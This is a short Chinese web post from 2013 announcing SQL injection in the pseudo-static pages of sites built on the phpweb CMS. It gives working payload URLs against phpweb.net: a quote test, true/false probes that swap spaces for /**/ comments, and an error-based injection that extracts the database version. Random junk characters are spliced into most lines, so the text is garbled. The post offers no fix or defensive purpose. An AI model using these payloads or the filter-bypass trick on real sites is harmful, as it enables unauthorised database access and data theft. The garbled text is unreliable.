phpweb所有的整站程序伪静态页面都存在sql注入
. y! o9 v: S( V: E2 _
* Q. v4 C0 F6 B2 A/ L$ Q+ E# D主站:http://phpweb.net/8 b0 V0 \. W+ F3 ? o
加’检测:
9 e& q3 E* f' c2 D6 r + l7 d4 d# v, {3 z3 d
http://www.phpweb.net/down/html/?772′.html0 f0 [/ ~3 q7 l1 a: i
, A3 @! Y# i8 ~; ]" {/ s" s; U8 w
出错; p. c4 I/ c% I, v, F) k, M- m4 y( O
存在注入。
, |: w+ R5 U8 X( ]1 f8 ^不能用空格,只能用/*罗
/ i0 ]+ c8 f, U W- g1 T1 ~3 Lhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常/ K1 {' c1 m9 Q& k6 F
6 \: \. O1 l( {2 r1 s3 Y9 m
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
9 C9 B- o4 P1 w. r7 j爆数据库版本:
. Z8 f' C5 {! i$ \0 }8 { * Y8 e8 ?7 I. z# C( o
?
; `0 s8 k0 |: @1 M' [* b( F1" j" U# f' z: Z& T
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
' ]' u# H: O/ R- V4 o" {8 n更新日期: 2013-01-03 13:39:50 % X( ?7 g: U* @5 a
|